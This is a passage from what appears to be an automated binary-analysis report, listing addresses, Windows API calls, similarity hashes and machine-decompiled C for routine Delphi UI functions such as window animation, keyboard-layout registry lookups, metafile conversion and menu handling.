                                                                        0x0043e188
                                                                        0x0043e189
                                                                        0x0043e18a
                                                                        0x0043e18c
                                                                        0x0043e18f
                                                                        0x0043e198
                                                                        0x0043e1a1
                                                                        0x0043e1a2
                                                                        0x0043e1a7
                                                                        0x0043e1aa
                                                                        0x0043e1b2
                                                                        0x0043e1b7
                                                                        0x0043e1c1
                                                                        0x0043e1d8
                                                                        0x0043e1e7
                                                                        0x0043e1e7
                                                                        0x0043e1fc
                                                                        0x0043e20b
                                                                        0x0043e20b
                                                                        0x0043e218
                                                                        0x0043e221
                                                                        0x0043e221
                                                                        0x0043e22e
                                                                        0x0043e237
                                                                        0x0043e237
                                                                        0x0043e25d
                                                                        0x0043e275
                                                                        0x0043e29d
                                                                        0x0043e2a6
                                                                        0x0043e2b5
                                                                        0x0043e2be
                                                                        0x0043e2cc
                                                                        0x0043e2d7
                                                                        0x0043e2d7
                                                                        0x0043e2d7
                                                                        0x0043e2fb
                                                                        0x0043e2fb
                                                                        0x0043e2a6
                                                                        0x0043e30c
                                                                        0x0043e316
                                                                        0x0043e31b
                                                                        0x0043e31e
                                                                        0x0043e321
                                                                        0x0043e32e
                                                                        0x0043e334
                                                                        0x0043e337
                                                                        0x0043e33e

                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E25D
                                                                        • GetTickCount.KERNEL32 ref: 0043E262
                                                                        • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043E29D
                                                                        • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043E2B5
                                                                        • AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043E2FB
                                                                        • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043E33F), ref: 0043E30C
                                                                        • GetTickCount.KERNEL32 ref: 0043E326
                                                                          • Part of subcall function 004413CC: GetCursorPos.USER32(?), ref: 004413D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                        • String ID:
                                                                        • API String ID: 3024527889-0
                                                                        • Opcode ID: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction ID: 7261888abba92b40dc426993c3f0a1dc2aaa4b26281b0a3ad08c4c814d8d1b3d
                                                                        • Opcode Fuzzy Hash: f4f60809fc3c55fa7bfb8adf48c85d06a3e4bd1bd40411fcc5e6a40c3df89d3b
                                                                        • Instruction Fuzzy Hash: 9D516474A00105EFDB10EFA9C985A9EB7F5EF49304F2045AAF500EB391D775AE80CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454414, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E00454414(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;

				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x4545bf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x4545c6);
					return E00404348( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004035AC(1);
					E00404348(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E00416868( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E0044183C( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E004092EC( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x45457b);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E004045B0( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E004045B0(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x454582);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}




















                                                                        0x00454415
                                                                        0x00454417
                                                                        0x00454420
                                                                        0x00454426
                                                                        0x0045442b
                                                                        0x0045442c
                                                                        0x00454431
                                                                        0x00454434
                                                                        0x0045443e
                                                                        0x004545a0
                                                                        0x004545a8
                                                                        0x004545ab
                                                                        0x004545ae
                                                                        0x004545be
                                                                        0x00454444
                                                                        0x00454453
                                                                        0x0045445c
                                                                        0x0045446f
                                                                        0x00454472
                                                                        0x0045458f
                                                                        0x00454595
                                                                        0x0045459b
                                                                        0x00000000
                                                                        0x00454478
                                                                        0x00454479
                                                                        0x00454482
                                                                        0x00454485
                                                                        0x00454491
                                                                        0x00000000
                                                                        0x00454497
                                                                        0x004544a9
                                                                        0x004544af
                                                                        0x004544d9
                                                                        0x00000000
                                                                        0x004544df
                                                                        0x004544e1
                                                                        0x004544e2
                                                                        0x004544e7
                                                                        0x004544ea
                                                                        0x004544ed
                                                                        0x00454513
                                                                        0x00454526
                                                                        0x0045453e
                                                                        0x0045454c
                                                                        0x0045455f
                                                                        0x0045455f
                                                                        0x0045454c
                                                                        0x00454566
                                                                        0x00454569
                                                                        0x0045456c
                                                                        0x0045457a
                                                                        0x0045457a
                                                                        0x004544d9
                                                                        0x00000000
                                                                        0x00454582
                                                                        0x00454582
                                                                        0x00454586
                                                                        0x00454586
                                                                        0x00454586
                                                                        0x00000000
                                                                        0x00454485
                                                                        0x00454472
                                                                        0x00000000

                                                                        APIs
                                                                        • GetKeyboardLayoutList.USER32(00000040,?,00000000,004545BF,?,0217094C,?,00454621,00000000,?,00438B67), ref: 0045446A
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 004544D2
                                                                        • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 0045450C
                                                                        • RegCloseKey.ADVAPI32(?,00454582,00000000,?,00000100,00000000,0045457B,?,80000002,00000000), ref: 00454575
                                                                        Strings
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004544BC
                                                                        • layout text, xrefs: 00454503
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 1703357764-2652665750
                                                                        • Opcode ID: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction ID: 2539a2497d52caec4cc5f2bae2980b59186013e12a04a0a3c27255b3f8e2aff6
                                                                        • Opcode Fuzzy Hash: 189765bfa51e4266e6c4d7a058433c68c56dc4b3013e98b6798dc43b9e3e9b53
                                                                        • Instruction Fuzzy Hash: 3D414174A0020DAFDB10DF55C981B9EB7F8EB88704F5144A6EA04EB352E734EE44DB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042326C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E0042326C(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EF0( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E00421870( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0x4233a7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E00402754(_v12);
					_push(_t84);
					_push(0x423387);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420A80(_t68);
					}
					E00416B7C(_t81, 0x16,  &_v38);
					E00416B7C(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(E0042338E);
					return E00402774(_v8);
				}
			}





















                                                                        0x0042326d
                                                                        0x0042326f
                                                                        0x00423274
                                                                        0x00423276
                                                                        0x0042327c
                                                                        0x004233b3
                                                                        0x00423282
                                                                        0x0042328c
                                                                        0x00423291
                                                                        0x00423294
                                                                        0x0042329b
                                                                        0x004232a2
                                                                        0x004232ac
                                                                        0x004232a4
                                                                        0x004232a4
                                                                        0x004232a4
                                                                        0x004232c3
                                                                        0x004232da
                                                                        0x004232e6
                                                                        0x004232f1
                                                                        0x004232f6
                                                                        0x004232f7
                                                                        0x004232fc
                                                                        0x004232ff
                                                                        0x00423315
                                                                        0x00423320
                                                                        0x00423325
                                                                        0x00423326
                                                                        0x0042332b
                                                                        0x0042332e
                                                                        0x0042334b
                                                                        0x0042334d
                                                                        0x0042334d
                                                                        0x0042335c
                                                                        0x00423369
                                                                        0x00423370
                                                                        0x00423373
                                                                        0x00423376
                                                                        0x00423386
                                                                        0x00423386

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232BE
                                                                        • MulDiv.KERNEL32(?,?,000009EC), ref: 004232D5
                                                                        • GetDC.USER32(00000000), ref: 004232EC
                                                                        • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004233A7,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00423310
                                                                        • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,00423387,?,?,00000000,00000000,00000008,?,00000000,004233A7), ref: 00423343
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: BitsFileMeta
                                                                        • String ID: `
                                                                        • API String ID: 858000408-2679148245
                                                                        • Opcode ID: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction ID: 3839b95b636f5826239c880ae12cce9acd53ea68cca29137c77ea4b08317ef11
                                                                        • Opcode Fuzzy Hash: 558b4f842d45610530c19de20ebe86704c1cece71444c5e02f9d3581222144b0
                                                                        • Instruction Fuzzy Hash: 7D314775B00258ABDB00DFD5D881AAEB7B8EF08704F514096F904EB291D6789E40D7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041C0B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E0041C0B0() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x495c4c; // 0x496030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x495acc; // 0x410438
					E0040A274(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403DA8();
				}
				if( *0x496a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x496a04);
					L004068AC();
					_push(_t58);
					_push(0x41c1c6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x47a4b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x47a4b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x47a4b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x47a4b8; // 0x0
							_v12 = E00414208(_t22, 0);
							_t24 =  *0x47a4b8; // 0x0
							E004140F8(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c179, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x496a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041C1D1);
					_push(0x496a04);
					L004069F4();
					return 0;
				}
			}



























                                                                        0x0041c0b1
                                                                        0x0041c0b3
                                                                        0x0041c0b6
                                                                        0x0041c0b7
                                                                        0x0041c0b8
                                                                        0x0041c0b9
                                                                        0x0041c0be
                                                                        0x0041c0c6
                                                                        0x0041c0cd
                                                                        0x0041c0d0
                                                                        0x0041c0da
                                                                        0x0041c0e7
                                                                        0x0041c0ec
                                                                        0x0041c0ec
                                                                        0x0041c0f8
                                                                        0x0041c1cd
                                                                        0x0041c1da
                                                                        0x0041c0fe
                                                                        0x0041c0fe
                                                                        0x0041c103
                                                                        0x0041c10a
                                                                        0x0041c10b
                                                                        0x0041c110
                                                                        0x0041c113
                                                                        0x0041c11d
                                                                        0x0041c12a
                                                                        0x0041c12a
                                                                        0x0041c11f
                                                                        0x0041c11f
                                                                        0x0041c128
                                                                        0x0041c12e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041c128
                                                                        0x0041c130
                                                                        0x0041c137
                                                                        0x0041c19c
                                                                        0x0041c19c
                                                                        0x0041c1a5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0041c13d
                                                                        0x0041c147
                                                                        0x0041c14c
                                                                        0x0041c151
                                                                        0x0041c161
                                                                        0x0041c16c
                                                                        0x0041c171
                                                                        0x0041c174
                                                                        0x0041c197
                                                                        0x0041c197
                                                                        0x0041c1a7
                                                                        0x0041c1a7
                                                                        0x0041c1b0
                                                                        0x0041c1b3
                                                                        0x0041c1b6
                                                                        0x0041c1bb
                                                                        0x0041c1c0
                                                                        0x0041c1c5
                                                                        0x0041c1c5

                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0B9
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041C0C8
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A04,?,?,00000000), ref: 0041C103
                                                                        • SetEvent.KERNEL32(?,?,00496A04,?,?,00000000), ref: 0041C197
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A04,0041C1D1,00496A04,?,?,00000000), ref: 0041C1C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalCurrentSectionThread$EnterEventLeave
                                                                        • String ID: 0`I
                                                                        • API String ID: 130076905-2983702033
                                                                        • Opcode ID: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction ID: d3fc0090a8b2a4d8759e39c8523565b2f55ac54e1dab5fd3bc4b06f7a5c1992e
                                                                        • Opcode Fuzzy Hash: d0ef8c18c672c5093def7dce1c420b319e01ce4750e548a04579464797611688
                                                                        • Instruction Fuzzy Hash: 53314634284240AFD701DB64DC85BAE7BE4EB4A314F2680BBE405936A2C77D58D5CB2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004467FC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004467FC(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E004467FC(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044692C(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044692C(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044692C(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E004466C8(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x44531c; // 0x445368
						if(E00403768( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044692C(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                        0x004467fc
                                                                        0x00446800
                                                                        0x00446806
                                                                        0x00446810
                                                                        0x00446812
                                                                        0x00000000
                                                                        0x00446812
                                                                        0x0044681b
                                                                        0x00446820
                                                                        0x00000000
                                                                        0x00446822
                                                                        0x00446834
                                                                        0x00446839
                                                                        0x0044683d
                                                                        0x00446842
                                                                        0x0044684b
                                                                        0x00446855
                                                                        0x0044685c
                                                                        0x0044686c
                                                                        0x00446871
                                                                        0x00446871
                                                                        0x00446873
                                                                        0x00446874
                                                                        0x0044687a
                                                                        0x00446880
                                                                        0x004468b5
                                                                        0x004468b7
                                                                        0x004468bc
                                                                        0x00000000
                                                                        0x004468c2
                                                                        0x00446885
                                                                        0x00446892
                                                                        0x00000000
                                                                        0x004468a5
                                                                        0x004468a9
                                                                        0x004468b0
                                                                        0x00000000
                                                                        0x004468b0
                                                                        0x00446892
                                                                        0x0044687a
                                                                        0x004468c9

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hSD
                                                                        • API String ID: 0-1503840404
                                                                        • Opcode ID: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction ID: ba21534d86675a3933ba5c7ede87d647a4094e5fe0645c481f54663c532360df
                                                                        • Opcode Fuzzy Hash: 1876fe4bb239e0ece3342b9e9a9a543713abc34dcbc0b90a04d39e0c55f526ff
                                                                        • Instruction Fuzzy Hash: D2117871A0260596FB50BF3A9C0575B7B989F43749F06442BBC01A7387CA7DCC09865F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043E484, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 31%
                                                                        			E0043E484(void* __eax) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				char _t19;
				intOrPtr* _t21;
				void* _t23;
				intOrPtr* _t26;
				void* _t28;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x495998; // 0x496a9c
					_t17 =  *0x495998; // 0x496a9c
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L00426A90();
					_v8 = _t19;
					_push(_t49);
					_push(0x43e544);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x495c2c; // 0x496c08
					_t23 = E0045469C( *_t21,  *((short*)(__eax + 0x68)));
					_t4 =  &_v8; // 0x434646
					E00426AC8( *_t4, _t23);
					_t26 =  *0x495c2c; // 0x496c08
					_t28 = E0045469C( *_t26,  *((short*)(_t39 + 0x68)));
					_t6 =  &_v8; // 0x434646
					E00426AC8( *_t6, _t28);
					_push(0);
					_push(0);
					_push(0);
					_t7 =  &_v8; // 0x434646
					_push( *_t7);
					L00426B20();
					_push( &_v16);
					_push(0);
					L00426B30();
					_push(_v12);
					_push(_v16);
					_push(1);
					_t11 =  &_v8; // 0x434646
					_push( *_t11);
					L00426B20();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x43e54b);
					_t12 =  &_v8; // 0x434646
					_t37 =  *_t12;
					_push(_t37);
					L00426A98();
					return _t37;
				}
			}



















                                                                        0x0043e485
                                                                        0x0043e487
                                                                        0x0043e48b
                                                                        0x0043e492
                                                                        0x0043e54f
                                                                        0x0043e498
                                                                        0x0043e4a0
                                                                        0x0043e4ac
                                                                        0x0043e4b3
                                                                        0x0043e4b5
                                                                        0x0043e4b6
                                                                        0x0043e4bb
                                                                        0x0043e4c0
                                                                        0x0043e4c1
                                                                        0x0043e4c6
                                                                        0x0043e4c9
                                                                        0x0043e4d0
                                                                        0x0043e4d7
                                                                        0x0043e4de
                                                                        0x0043e4e1
                                                                        0x0043e4ea
                                                                        0x0043e4f1
                                                                        0x0043e4f8
                                                                        0x0043e4fb
                                                                        0x0043e500
                                                                        0x0043e502
                                                                        0x0043e504
                                                                        0x0043e506
                                                                        0x0043e509
                                                                        0x0043e50a
                                                                        0x0043e512
                                                                        0x0043e513
                                                                        0x0043e515
                                                                        0x0043e51d
                                                                        0x0043e521
                                                                        0x0043e522
                                                                        0x0043e524
                                                                        0x0043e527
                                                                        0x0043e528
                                                                        0x0043e52f
                                                                        0x0043e532
                                                                        0x0043e535
                                                                        0x0043e53a
                                                                        0x0043e53a
                                                                        0x0043e53d
                                                                        0x0043e53e
                                                                        0x0043e543
                                                                        0x0043e543

                                                                        APIs
                                                                        • 73451AB0.COMCTL32(00000000), ref: 0043E4B6
                                                                          • Part of subcall function 00426AC8: 73452140.COMCTL32(FFC,000000FF,00000000,0043E4E6,00000000,0043E544,?,00000000), ref: 00426ACC
                                                                        • 73451680.COMCTL32(FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E50A
                                                                        • 73451710.COMCTL32(00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E515
                                                                        • 73451680.COMCTL32(FFC,00000001,?,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E528
                                                                        • 73451F60.COMCTL32(FFC,0043E54B,0043E5AD,00000000,?,FFC,00000000,00000000,00000000,00000000,0043E544,?,00000000), ref: 0043E53E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 7345173451680$7345171073452140
                                                                        • String ID: FFC
                                                                        • API String ID: 821207058-3265319113
                                                                        • Opcode ID: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction ID: 8431b77a0cc210c779f3d261e8a6c9ecaf50c2f7b8c230ae1f7395ec22db308d
                                                                        • Opcode Fuzzy Hash: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction Fuzzy Hash: 48218174740214BFDB00EBE9DC92F6977F8EB49704F6044A6F904EB291DA79AD40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042761C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 47%
                                                                        			E0042761C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x496ac9 != 0) {
					_t24 = 0;
